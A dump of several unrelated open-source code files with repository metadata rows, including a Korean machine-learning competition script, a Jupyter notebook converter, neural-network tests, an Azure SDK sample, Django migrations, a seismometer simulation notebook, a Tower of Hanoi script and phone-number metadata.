test=pd.read_csv('./data/dacon/comp1/test.csv',header=0, index_col=0)
submission=pd.read_csv('./data/dacon/comp1/sample_submission.csv',header=0,index_col=0)
print("train.shape:",train.shape) # (10000, 75) # x_train , x_test , y_train , y_test/ 평가도 train으로
print("test.shape:",test.shape) # (10000, 71) # x_predict가 된다 # y값이 없다
print("submission.shape:",submission.shape) # (10000, 4) # y_predict가 된다
# test + submission = train
# test는 y값이 없음
#이상치는 알 수 없으나 결측치는 알 수 있다.
print(train.isnull().sum())
train=train.interpolate() #보간법//선형//완벽하진 않으나 평타 85%//컬럼별로 선을 잡아서 빈자리 선에 맞게 그려준다//컬럼별 보간
train=train.fillna(method='bfill')
print(train.isnull().sum())
print("train:",train.head())
print(test.isnull().sum())
test=test.interpolate()
test=test.fillna(method='bfill')
print("test:",test.head())
np.save('./data/comp1_train.npy',arr=train)
np.save('./data/comp1_test.npy',arr=test)
# 1. 데이터
train=np.load('./data/comp1_train.npy')
test=np.load('./data/comp1_test.npy')
from sklearn.model_selection import train_test_split, RandomizedSearchCV
from keras.layers import Dense, LSTM, Conv2D, MaxPooling2D, Flatten, Input
from keras.models import Sequential, Model
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold, cross_val_score
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
import warnings
from sklearn.tree import DecisionTreeRegressor
x=train[0:,0:71]
y=train[0:,71:]
print("x.shape:",x.shape) # (10000, 71)
print("y.shape:",y.shape) # (10000, 4)
x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2, random_state=60)
print("x_train.shape:",x_train.shape)
print("x_test.shape:",x_test.shape)
print("x_train",x_train)
print("x_test",x_test)
parameters={
'min_samples_leaf':[1,2,4,8,16],
'min_samples_split':[1,2,4,8,16]
}
warnings.simplefilter(action='ignore', category=FutureWarning)
#kfold
kfold=KFold(n_splits=5,shuffle=True)
#pipeline
# pipe = Pipeline([("scaler",StandardScaler()),('model',RandomForestRegressor())])
#모델구성
model=RandomizedSearchCV(DecisionTreeRegressor(),parameters,cv=kfold,n_jobs=-1)
#모델훈련
model.fit(x_train,y_train)
print("최적의 매개변수=",model.best_estimators_.feature_importances_)
"""
import matplotlib.pyplot as plt
import numpy as np
def plot_feature_importances_(model):
n_features=train.data.shape[1]
plt.barh(np.arange(n_features),model.feature_importances_, align='center')
plt.yticks(np.arange(n_features),model.feature_names)
plt.xlabel("Feature importance")
plt.ylabel("Features")
plt.ylim(-1,n_features)
plt.subplots(figsize=(15,6))
plot_feature_importances_(model)
plt.show()
"""
"""
#평가, 예측
y_predict=model.predict(x_test)
result=model.predict(test)
from sklearn.metrics import mean_absolute_error
mae=mean_absolute_error(y_test,y_predict)
print("mae:",mae)
a = np.arange(10000,20000)
#np.arange--수열 만들때
submission = result
submission = pd.DataFrame(submission, a)
submission.to_csv("./data/dacon/comp1/sample_submission1_7.csv", header = ["hhb", "hbo2", "ca", "na"], index = True, index_label="id" )
"""
mae: 1.537
"""
"""
| [
"hwalim9612@gmail.com"
] | hwalim9612@gmail.com |
a5e9844ef7a8111c56eb3a1649bb77022f0d4a5c | 49c3abd2b3fbb3bc5d1df47b1fddd09694ee4835 | /scripts/translate_figs.py | 6d2ad35b0719ad7472ee6b8091d0baa8be07d3e2 | [] | no_license | phaustin/e213_2019 | 0b9970745e1bee29b58fa97bd425b66e01c20db8 | ff66cc94cba57f53955cbbb4a72885146cabd5e4 | refs/heads/master | 2021-05-18T18:48:38.507719 | 2019-04-18T18:48:12 | 2019-04-18T18:48:12 | 251,362,114 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,387 | py | """
Usage: python translate_figs.py notebook.py
Given a jupytext python:percent notebook,
change all occurances of an image tag like:
<img src="figures/2d_flux.png" alt="pic05" width="20%" >
to a python Image call like this:
# Image(figures/2d_flux.png){width="20%"}
and write it out as a new file called notebook_nbsphinx.py
along with a translated notebook notebook_nbsphinx.ipynb
"""
import argparse
import json
import pdb
import re
import sys
from pathlib import Path
import jupytext
import nbformat
from bs4 import BeautifulSoup
from jupytext.formats import JUPYTEXT_FORMATS
from jupytext.formats import rearrange_jupytext_metadata
from jupytext.jupytext import writes
from nbconvert.preprocessors import CellExecutionError
from nbconvert.preprocessors import ExecutePreprocessor
from nbformat.v4.nbbase import new_code_cell
from nbformat.v4.nbbase import new_markdown_cell
from nbformat.v4.nbbase import new_notebook
split_cell_re = re.compile(r"(.*)(#\s+.*\<img\s+src.*\>)(.*)", re.DOTALL)
image_re = re.compile(r"#\s+.*(\<img.*\>).*")
image_re = re.compile(r".*(\<img\s+src.*\>).*")
template = '# {{width="{width:}"}}\n'
py_template = 'Image("{src:}",width="{width:}")\n'
toc_meta = {
"toc": {
"base_numbering": 1,
"nav_menu": {},
"number_sections": True,
"sideBar": True,
"skip_h1_title": True,
"title_cell": "Table of Contents",
"title_sidebar": "Contents",
"toc_cell": True,
"toc_position": {},
"toc_section_display": True,
"toc_window_display": True,
}
}
fmt_dict = {item.format_name: item for item in JUPYTEXT_FORMATS}
def make_parser():
"""
set up the command line arguments needed to call the program
"""
linebreaks = argparse.RawTextHelpFormatter
parser = argparse.ArgumentParser(
formatter_class=linebreaks, description=__doc__.lstrip()
)
parser.add_argument("infile", type=str, help="name of pytnon notebook")
return parser
def main(args=None):
parser = make_parser()
args = parser.parse_args(args)
infile = Path(args.infile).resolve()
in_dir = infile.parent
py_outfile = in_dir / f"{infile.stem}_nbsphinx.py"
nb_outfile = in_dir.parent / f"{infile.stem}_nbsphinx.ipynb"
print(f"writing:\n{py_outfile}\n{nb_outfile}")
with open(infile, "r") as input_file:
in_py = input_file.readlines()
# collect = ""
# for the_line in in_py:
# match = image_re.match(the_line)
# if match:
# text = match.group(1)
# soup = BeautifulSoup(text, "html.parser")
# out = soup()
# md_image = template.format_map(out[0].attrs)
# collect += md_image
# else:
# collect += the_line
# with open(py_outfile, "w") as output_file:
# output_file.write(collect)
# with open(nb_outfile, "w") as output_file:
# nb = jupytext.readf(py_outfile)
# jupytext.writef(nb, nb_outfile, fmt="ipynb")
orig_nb = jupytext.readf(infile)
split_cell_re = re.compile(
r"^(?P<front>.*?)(?P<img>\<img\s+src.*\>)(?P<back>.*?)", re.DOTALL
)
need_display_import = True
new_nb_cells = list(orig_nb.cells)
for index, item in enumerate(orig_nb.cells):
print(f"at cell {index}")
item["metadata"]["cell_count"] = index
if item["cell_type"] == "markdown":
text = item["source"]
if text.find("pic") > -1:
print(f"found img for: {text[:20]}")
out = split_cell_re.match(text)
if out:
print(f"length of split is {len(out.groups())}")
print(f"splitting cell at index {index}")
cell_dict = dict()
for name in ["front", "back"]:
src = out.group(name)
if len(src) > 0:
cell_dict[name] = new_markdown_cell(source=src)
src = out.group("img")
match = image_re.match(src)
if match:
text = match.group(1)
soup = BeautifulSoup(text, "html.parser")
out = soup()
py_image = py_template.format_map(out[0].attrs)
cell_dict["img"] = new_code_cell(source=py_image)
count = 0
for key in ["front", "img", "back"]:
try:
if key == "front":
new_nb_cells[index] = cell_dict[key]
else:
new_nb_cells.insert(index + count, cell_dict[key])
count += 1
except KeyError:
pass
else:
item["metadata"]["cell_count"] = index
if item["source"].find("IPython.display") > -1:
need_display_import = False
print(f"found python cell: {item['source']}")
if need_display_import:
top_cell = new_code_cell(source="from IPython.display import Image")
new_nb_cells.insert(1, top_cell)
orig_nb.cells = new_nb_cells
# https://nbconvert.readthedocs.io/en/latest/execute_api.html
print(f"running notebook in folder {nb_outfile.parent}")
ep = ExecutePreprocessor(timeout=600, kernel_name="python3", allow_errors=True)
path = str(nb_outfile.parent)
path_dict = dict({"metadata": {"path": path}})
try:
out = ep.preprocess(orig_nb, path_dict)
except CellExecutionError:
out = None
msg = f"Error executing the notebook {nb_outfile.name}.\n\n"
msg += f"See notebook {nb_outfile.name} for the traceback."
print(msg)
raise
finally:
if "toc" not in orig_nb["metadata"]:
orig_nb["metadata"].update(toc_meta)
pdb.set_trace()
rearrange_jupytext_metadata(orig_nb["metadata"])
out = writes(orig_nb, "py", nbformat.NO_CONVERT)
pdb.set_trace()
with open(nb_outfile, mode="wt") as f:
nbformat.write(orig_nb, f)
jupytext.writef(orig_nb, py_outfile, fmt="py")
print(f"wrote {nb_outfile} and \n {py_outfile}")
if __name__ == "__main__":
#
# will exit with non-zero return value if exceptions occur
#
# args = ['vancouver_hires.h5']
sys.exit(main())
| [
"paustin@eos.ubc.ca"
] | paustin@eos.ubc.ca |
2ebe41aa7b83bf751f563796d36307ca3e0d94da | 8e6546515c8094f2df7fca4be343b57a1716257a | /tests/algorithms/associative/test_kohonen.py | d8a23d2f1bcfb9f72d8e7f49994c478d12883f70 | [
"MIT"
] | permissive | FGDBTKD/neupy | b51e5870ef75df8aa3dcfb6753648a235f39e50b | 1f5e1ae9364e8c7816df79678a4648c689d2a5d1 | refs/heads/master | 2020-03-31T13:32:57.099935 | 2018-10-29T15:52:19 | 2018-10-29T15:52:19 | 152,260,277 | 0 | 0 | MIT | 2018-10-29T15:52:20 | 2018-10-09T13:56:16 | Python | UTF-8 | Python | false | false | 1,731 | py | import numpy as np
from neupy import algorithms
from base import BaseTestCase
input_data = np.array([
[0.1961, 0.9806],
[-0.1961, 0.9806],
[0.9806, 0.1961],
[0.9806, -0.1961],
[-0.5812, -0.8137],
[-0.8137, -0.5812],
])
class KohonenTestCase(BaseTestCase):
def test_kohonen_success(self):
kh = algorithms.Kohonen(
n_inputs=2,
n_outputs=3,
weight=np.array([
[0.7071, 0.7071, -1.0000],
[-0.7071, 0.7071, 0.0000],
]),
step=0.5,
verbose=False,
)
# test one iteration update
data = np.reshape(input_data[0, :], (1, input_data.shape[1]))
kh.train(data, epochs=1)
np.testing.assert_array_almost_equal(
kh.weight,
np.array([
[0.7071, 0.4516, -1.0000],
[-0.7071, 0.84385, 0.0000],
]),
decimal=4
)
def test_train_different_inputs(self):
self.assertInvalidVectorTrain(
algorithms.Kohonen(
n_inputs=1,
n_outputs=2,
step=0.5,
verbose=False
),
np.array([1, 2, 3])
)
def test_predict_different_inputs(self):
knet = algorithms.Kohonen(
n_inputs=1,
n_outputs=2,
step=0.5,
verbose=False,
)
data = np.array([[1, 1, 1]]).T
target = np.array([
[1, 0],
[1, 0],
[1, 0],
])
knet.train(data, epochs=100)
self.assertInvalidVectorPred(knet, data.ravel(), target,
decimal=2)
| [
"mail@itdxer.com"
] | mail@itdxer.com |
39f57c10873dc5efeea1c40d3f35d8a875752a36 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/network/azure-mgmt-network/generated_samples/virtual_network_tap_update_tags.py | 8ee1c7cf9b1a0d4963d50d2406f32510d2a37a27 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,614 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-network
# USAGE
python virtual_network_tap_update_tags.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = NetworkManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.virtual_network_taps.update_tags(
resource_group_name="rg1",
tap_name="test-vtap",
tap_parameters={"tags": {"tag1": "value1", "tag2": "value2"}},
)
print(response)
# x-ms-original-file: specification/network/resource-manager/Microsoft.Network/stable/2023-04-01/examples/VirtualNetworkTapUpdateTags.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
627ad397bc9cac97d59ee45e981aabac63839ec2 | 1e8142725aa06844713d18fa38c6779aff8f8171 | /tndata_backend/goals/migrations/0039_auto_20150501_1332.py | 47957608f0a0fba364284a0e0abc1a51866ca164 | [
"MIT"
] | permissive | tndatacommons/tndata_backend | 8f4db3e5cf5272901c9087a85e21d7560240bb3b | 3d22179c581ab3da18900483930d5ecc0a5fca73 | refs/heads/master | 2020-12-03T07:53:17.339769 | 2017-03-27T06:18:58 | 2017-03-27T06:18:58 | 68,407,220 | 1 | 2 | null | 2017-03-27T06:18:59 | 2016-09-16T18:59:16 | Python | UTF-8 | Python | false | false | 3,086 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('goals', '0038_remove_behavior_categories'),
]
operations = [
migrations.AlterField(
model_name='action',
name='description',
field=models.TextField(help_text='A brief (250 characters) description about this item.', blank=True),
),
migrations.AlterField(
model_name='action',
name='notification_text',
field=models.CharField(help_text='Text of the notification (50 characters)', max_length=256, blank=True),
),
migrations.AlterField(
model_name='action',
name='title',
field=models.CharField(db_index=True, unique=True, max_length=256, help_text='A unique title for this item (50 characters)'),
),
migrations.AlterField(
model_name='behavior',
name='description',
field=models.TextField(help_text='A brief (250 characters) description about this item.', blank=True),
),
migrations.AlterField(
model_name='behavior',
name='informal_list',
field=models.TextField(help_text='Use this section to create a list of specific actions for this behavior. This list will be reproduced as a mnemonic on the Action entry page', blank=True),
),
migrations.AlterField(
model_name='behavior',
name='notification_text',
field=models.CharField(help_text='Text of the notification (50 characters)', max_length=256, blank=True),
),
migrations.AlterField(
model_name='behavior',
name='title',
field=models.CharField(db_index=True, unique=True, max_length=256, help_text='A unique title for this item (50 characters)'),
),
migrations.AlterField(
model_name='category',
name='description',
field=models.TextField(help_text='A short (250 character) description for this Category'),
),
migrations.AlterField(
model_name='category',
name='title',
field=models.CharField(db_index=True, unique=True, max_length=128, help_text='A Title for the Category (50 characters)'),
),
migrations.AlterField(
model_name='goal',
name='description',
field=models.TextField(help_text='A short (250 character) description for this Goal', blank=True),
),
migrations.AlterField(
model_name='goal',
name='icon',
field=models.ImageField(null=True, upload_to='goals/goal', help_text='Upload an icon (256x256) for this goal', blank=True),
),
migrations.AlterField(
model_name='goal',
name='title',
field=models.CharField(db_index=True, unique=True, max_length=256, help_text='A Title for the Goal (50 characters)'),
),
]
| [
"brad@bradmontgomery.net"
] | brad@bradmontgomery.net |
5ab68abc62761c0926aa94485ba9a542df2e4131 | 3bf6b373547dae4eca53af9a9271745085632209 | /backend/home/migrations/0002_load_initial_data.py | f06014022267c67e7065dad06b6386bfcd0562c7 | [] | no_license | crowdbotics-apps/fruit-of-peace-18240 | 282f78884ed4763c5bee3609ff2184d856215d5e | b24c20465987c185a7bc39269a5166cbed287752 | refs/heads/master | 2022-11-06T01:14:57.924906 | 2020-06-19T00:08:33 | 2020-06-19T00:08:33 | 273,361,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,310 | py | from django.db import migrations
def create_customtext(apps, schema_editor):
CustomText = apps.get_model("home", "CustomText")
customtext_title = "Fruit Of Peace"
CustomText.objects.create(title=customtext_title)
def create_homepage(apps, schema_editor):
HomePage = apps.get_model("home", "HomePage")
homepage_body = """
<h1 class="display-4 text-center">Fruit Of Peace</h1>
<p class="lead">
This is the sample application created and deployed from the Crowdbotics app.
You can view list of packages selected for this application below.
</p>"""
HomePage.objects.create(body=homepage_body)
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "fruit-of-peace-18240.botics.co"
site_params = {
"name": "Fruit Of Peace",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("home", "0001_initial"),
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_customtext),
migrations.RunPython(create_homepage),
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
7f3c2dc97ed990179b60119f2568b0b551417524 | e73d4b7bb0bbbc6f547a9bac7b5a2a97059fbb4f | /cicd_project/blog/models.py | 5c2b726e65984ebda2bda432f0c063942242e473 | [] | no_license | soohyun-lee/cicd_dev | 0d7ad568cfafd07d940a9938ae2a2f624b8556f7 | 472048d4c46ca283ede9490206055c00eabcea07 | refs/heads/main | 2023-08-11T01:25:43.000435 | 2021-08-10T01:51:06 | 2021-08-10T01:51:06 | 394,487,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | from django.db import models
from django.db.models.fields import CharField
class Booklist(models.Model):
name = CharField(max_length=100, null=True)
category = CharField(max_length=40, null=True)
class Meta:
db_table = 'bookList' | [
"soohyun527@gmail.com"
] | soohyun527@gmail.com |
ff1f87d47ce4289fd8848474d974dcd85f9435dc | d7f89062dc6524f2ed3b5bee349fe3f06246ffab | /chainercv/visualizations/__init__.py | 9449ed8a8e6c45c096b9d72f8ce91fadae2e2e4c | [
"MIT"
] | permissive | fukatani/chainercv | d9943afa1eb2465a36a23ffee08d4414ffa7ed84 | 49acfb2bd76742237e8cd3e8ce132de357b58c4d | refs/heads/master | 2021-09-10T14:06:49.348027 | 2018-03-23T03:52:51 | 2018-03-23T03:52:51 | 114,512,105 | 0 | 0 | null | 2017-12-17T05:32:51 | 2017-12-17T05:32:50 | null | UTF-8 | Python | false | false | 290 | py | from chainercv.visualizations.vis_bbox import vis_bbox # NOQA
from chainercv.visualizations.vis_image import vis_image # NOQA
from chainercv.visualizations.vis_point import vis_point # NOQA
from chainercv.visualizations.vis_semantic_segmentation import vis_semantic_segmentation # NOQA
| [
"yuyuniitani@gmail.com"
] | yuyuniitani@gmail.com |
53990e9e54df628151cb3075384dd3ecd9f10e89 | a5882e39df9fb1ded1a3941c4b43646010dc2c3a | /can-funds-be-transferred-b.py | 04691eb50e4ef5e978febaecdf8c3f32ac4bf31d | [] | no_license | hlltarakci/hackerrank | d58c8761cf21a64fd6f85bb6f82ae7a3964e7cf1 | fb5adf854f528ac46330c45172f93dfcd37aed49 | refs/heads/master | 2020-03-27T08:49:52.519889 | 2018-08-24T06:40:08 | 2018-08-24T06:40:08 | 146,291,257 | 1 | 0 | null | 2018-08-27T11:58:55 | 2018-08-27T11:58:55 | null | UTF-8 | Python | false | false | 2,060 | py | #!/usr/bin/env python3
import functools
import itertools
# # Use this function to write data to socket
# # write_string_to_socket(connection, message) where connection is the socket object and message is string
# # Use this function to read data from socket
# # def read_string_from_socket(connection) where connection is the socket object
# # All global declarations go here
parents = None
parent_probs = None
# # This function is called only once before any client connection is accepted by the server.
# # Read any global datasets or configurations here
def init_server():
global parents, parent_probs
print("Reading training set")
f = open("training.txt")
N = int(f.readline())
parents = [None] * (N + 1)
parent_probs = [None] * (N + 1)
for _ in range(N - 1):
u, v, p = map(int, f.readline().split(","))
parents[v] = u
parent_probs[v] = p / 100
# # This function is called everytime a new connection is accepted by the server.
# # Service the client here
def process_client_connection(connection):
while True:
# read message
message = read_string_from_socket(connection).decode()
print("Message received = ", message)
if message == "END":
result = message
else:
fields = message.split(",")
a, b = map(int, fields[:2])
q1 = float(fields[2])
q = pow(10, q1)
result = "YES" if compute_distance(a, b) > q else "NO"
# write message
write_string_to_socket(connection, result.encode())
if message == "END":
break
def compute_distance(a, b):
path_a = find_path(a)
path_b = find_path(b)
while path_a and path_b and path_a[-1] == path_b[-1]:
del path_a[-1]
del path_b[-1]
return functools.reduce(lambda x, y: x * y, map(lambda n: parent_probs[n], itertools.chain(path_a, path_b)))
def find_path(n):
path = [n]
while parents[n]:
path.append(parents[n])
n = parents[n]
return path
| [
"charles.wangkai@gmail.com"
] | charles.wangkai@gmail.com |
0c349048cf8dcc51df1a847c1a3fa879b204b10a | d1808d8cc5138489667b7845466f9c573591d372 | /notebooks/Computational Seismology/The Finite-Difference Method/fd_seismometer_solution.py | 154d22e4b1082f796247ce50c3d5933ed4f2c6e6 | [] | no_license | krischer/seismo_live | e140777900f6246a677bc28b6e68f0a168ec41ab | fcc615aee965bc297e8d53da5692abb2ecd6fd0c | refs/heads/master | 2021-10-20T22:17:42.276096 | 2019-11-27T23:21:16 | 2019-11-28T10:44:21 | 44,953,995 | 69 | 59 | null | 2020-05-22T11:00:52 | 2015-10-26T08:00:42 | Python | UTF-8 | Python | false | false | 8,047 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div style='background-image: url("../../share/images/header.svg") ; padding: 0px ; background-size: cover ; border-radius: 5px ; height: 250px'>
# <div style="float: right ; margin: 50px ; padding: 20px ; background: rgba(255 , 255 , 255 , 0.7) ; width: 50% ; height: 150px">
# <div style="position: relative ; top: 50% ; transform: translatey(-50%)">
# <div style="font-size: xx-large ; font-weight: 900 ; color: rgba(0 , 0 , 0 , 0.8) ; line-height: 100%">Computational Seismology</div>
# <div style="font-size: large ; padding-top: 20px ; color: rgba(0 , 0 , 0 , 0.5)">Finite Differences - Seismometer Equation</div>
# </div>
# </div>
# </div>
# <p style="width:20%;float:right;padding-left:50px">
# <img src=../../share/images/book.jpg>
# <span style="font-size:smaller">
# </span>
# </p>
#
#
# ---
#
# This notebook is part of the supplementary material
# to [Computational Seismology: A Practical Introduction](https://global.oup.com/academic/product/computational-seismology-9780198717416?cc=de&lang=en&#),
# Oxford University Press, 2016.
#
#
# ##### Authors:
# * Ashim Rijal ([@ashimrijal](https://github.com/ashimrijal))
# * Heiner Igel ([@heinerigel](https://github.com/heinerigel))
#
# This exercise covers the following aspects:
#
# * Solving seismometer equation with finite difference method
# * Getting familiar with seismometer response function
# ---
# ## Basic Equations
#
# ** Please refer to the Exercise 4.19 from the book.**
#
# The seismometer equation is given by
# $$
# \ddot{x} + 2\epsilon \dot{x} + \omega^2_0 x = - \ddot{u}
# $$
#
# Where,
#
# $ \epsilon $ is the damping parameter,
#
# $ \omega_0 $ is the eigenfrequency,
#
# $ \ddot{u}(t) $ is the ground motion by which the seismometer is excited, and
#
# $ x(t) $ is the motion of the seismometer mass.
#
# We replace the time derivative by centered finite-differentiation
# $$
# \dot{x} \ \approx \ \frac{x (t + \mathrm{d}t) - x ( t- \mathrm{d}t)} {2\mathrm{d}t}
# $$
#
# $$
# \ddot{x} \ \approx \ \frac{x( t+ \mathrm{d}t)-2x(t) + x( t- \mathrm{d}t)} {\mathrm{d}t^2}
# $$
#
# Now, solving for $ x(t+\mathrm{d}t) $ the extrapolation scheme is
#
# $$
# x(t+\mathrm{d}t) = \frac{ - \ddot{u}(t) \mathrm{d}t^2 + (2-\omega^2_0 \mathrm{d}t^2) x(t) + (\epsilon \mathrm{d}t-1) x(t-\mathrm{d}t)} {(1+\epsilon \mathrm{d}t)}
# $$
#
# ### Exercise
#
# ** Part 1**
#
# While running the following cells frequency of forcing (the frequency of ground motion) and the damping parameter will be asked to enter. First try using undamped seismometer (i.e. h = 0) for some forcing frequency (eg. 0.1 Hz, 1 Hz, 2Hz, 3Hz, 4Hz, 5Hz, etc.) and interpret the results.
#
# ** Part 2**
#
# Now try frequency of forcing of your choice (eg. 1 HZ) and try to search for suitable damping parameter (h).
#
# **Message: Once you become familiar with all the codes below you can go to the Cell tab on the toolbar and click Run All.**
# + {"code_folding": [0]}
#Configuration step (Please run it before the simulation code!)
import numpy as np
import matplotlib
# Show Plot in The Notebook
matplotlib.use("nbagg")
import matplotlib.pyplot as plt
matplotlib.rcParams['figure.facecolor'] = 'w' # remove grey background
# + {"code_folding": []}
#Initialization of parameters
f0 = 1. # eigenfrequency of seismometer (hertz)
w = 2. * np.pi * f0 # in radians per second
dt = .01 # time increment for numerical scheme
isnap = 2 # snapshot frequency for visualization
# Central frequency of forcing or ground motion (will be asked)
fu0 = 1.0
# Uncomment for interactivity.
# fu0 = float(input('Give frequency of forcing (e.g. f=1 Hz) : '))
# Damping parameter of seismometer (will be asked)
h = 0.5
# Uncomment for interactivity.
# h = float(input('Give damping parameter (e.g. h=0.5) : '))
# Initialize ground motion
# Initialize parameters for ground motion
p = 1. / fu0 # period
nts = int(2. * p / dt) # time steps
uii = np.zeros(nts) # ground motion
t0 = p / dt # time (S)
a = 4. / p # half-width (so called sigma)
# we use derivative of a Gaussian as our ground motion
for it in range(nts):
t = (it - t0) * dt
uii[it] = -2 * a * t * np.exp(-(a * t) ** 2)
nt = int(round(5. * 1. / fu0 / dt)) # total number of time steps
src = np.zeros(nt) # initialize an source array of zeros
src[0:len(uii)] = uii # make derivative of gaussian as source
# End initialization of ground motion
# Initial conditions
eps = h * w # damping factor
x = np.zeros(nt)
xnow = 0
xold = 0
x_vector = np.zeros(nt)
# + {"code_folding": [33]}
# Extrapolation scheme and the plots
# Initialization of plots
# lines1 will plot the seismometer response and lines2 for source function
lines1 = plt.plot(np.dot((np.arange(1, nt+1)), dt), x_vector[0:nt] /
np.max(np.abs(x[0:nt])), color = "red", lw = 1.5, label="Seismometer response")
lines2 = plt.plot(np.zeros(nt), color = 'blue',lw = 1.5, label="Ground Acceleration")
plt.title("At rest")
plt.axis([0, nt*dt, -1, 1])
plt.xlabel("Time (s)")
plt.ylabel("Displacement")
plt.legend(loc="upper right")
plt.ion()
plt.show()
# Begin extrapolation and update the plot
# Extrapolation scheme (Centered finite-difference)
for i in range(nt):
if i == 0:
xold = xnow
xnew = (-src[i] * dt ** 2 + (2 - w ** 2 * dt ** 2) * xnow + (eps * dt - 1) * xold) / (1 + eps * dt)
xold = xnow # for next loop present will be past
xnow = xnew # for next step future will be present
x[i] = xnow
x_vector[i] = x[i]
# Updating the plots
if not i % isnap:
for l in lines1:
l.remove()
del l
for k in lines2:
k.remove()
del k
lines1 = plt.plot(np.dot((np.arange (1, i+1)), dt), x_vector[0:i] /
np.max(np.abs (x[0:nt])),color = "red",lw = 1.5, label="Seismometer response")
lines2 = plt.plot(np.dot((np.arange (1, i+1)), dt), src[0:i] /
np.max(src[0:nt]), color = 'blue',lw = 1.5, label="Ground Acceleration")
plt.title("F0 = 1Hz, SRC = %.2f Hz, h = %.2f " % (fu0, h))
plt.gcf().canvas.draw()
plt.ioff()
plt.show()
# + {"tags": ["solution"], "cell_type": "markdown"}
# ## Solutions
# **Part 1**
#
# Let us try frequency of forcing 1 Hz and damping parameter h = 0. Then we see that response of seismometer doesn't come to rest even after the ground motion comes to rest.
#
# ** Part 2**
#
# For low damping (h< 1) there exists a peak in the response function, underdamped case. If h=1, the seismometer comes to rest in the least possible time without overshooting, a case called critically damped where the response curve has no peak. The most common values used in seismometres are close to critical (eg. 0.707) in which seismometers perform optimally. For values greater than 1 (h> 1) the sensitivity of seismometer decreases, a case of overdamping.
| [
"lion.krischer@gmail.com"
] | lion.krischer@gmail.com |
87ab9929f76972431b26c279e2ae1beb0af37277 | 4ada7aa922154f5aefd2c5ae83ea5e4e3a392c6d | /Python/algorithm/hanoi_tower/하노이의탑.py | 4b6aa799cc2666c9cf56270080be00b7825ea21b | [
"MIT"
] | permissive | sug5806/TIL | ae483c0efc5c45f133993d1bd95a411fc6501140 | 2309d8a270e4a7b8961268a40b6492c5db317e37 | refs/heads/master | 2022-12-21T03:20:24.393316 | 2019-09-26T14:04:25 | 2019-09-26T14:04:25 | 180,498,457 | 0 | 0 | MIT | 2022-12-08T05:48:15 | 2019-04-10T03:56:28 | Go | UTF-8 | Python | false | false | 357 | py | n = 0
a = "A" # 출발
b = "B" # 중간
c = "C" # 도착
def hanoi(n, a, b, c):
if n == 1:
print("{}번째 원반을 {}로 이동".format(n, c))
return
hanoi(n - 1, a, c, b)
print("{}번째 원반을 {}로 이동".format(n, c))
hanoi(n - 1, b, a, c)
if __name__ == "__main__":
hanoi(3, a, b, c)
| [
"sug5806@gmail.com"
] | sug5806@gmail.com |
32bdcc38967b67dbf751a35e5b61bee09851481f | 06c367fe2d2233c6efb64f323e15bebd7f48c625 | /venv/lib/python3.6/site-packages/phonenumbers/data/region_SJ.py | c90ff44f85e3f8c821321de9306a08f67ec87f90 | [
"BSD-3-Clause"
] | permissive | AkioSky/FishMart | ce630bc4addf63bc105e4f3e13e92c15b119b558 | 1d01d7e79812dc7cccb1b26ffc6457af6104d9f2 | refs/heads/master | 2022-12-11T16:13:38.277080 | 2019-04-22T03:44:22 | 2019-04-22T03:44:22 | 182,615,627 | 0 | 0 | BSD-3-Clause | 2022-12-08T01:44:37 | 2019-04-22T03:20:03 | Python | UTF-8 | Python | false | false | 1,503 | py | """Auto-generated file, do not edit by hand. SJ metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_SJ = PhoneMetadata(id='SJ', country_code=47, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='(?:0|(?:[4589]\\d|79)\\d\\d)\\d{4}', possible_length=(5, 8)),
fixed_line=PhoneNumberDesc(national_number_pattern='79\\d{6}', example_number='79123456', possible_length=(8,)),
mobile=PhoneNumberDesc(national_number_pattern='(?:4[015-8]|5[89]|9\\d)\\d{6}', example_number='41234567', possible_length=(8,)),
toll_free=PhoneNumberDesc(national_number_pattern='80[01]\\d{5}', example_number='80012345', possible_length=(8,)),
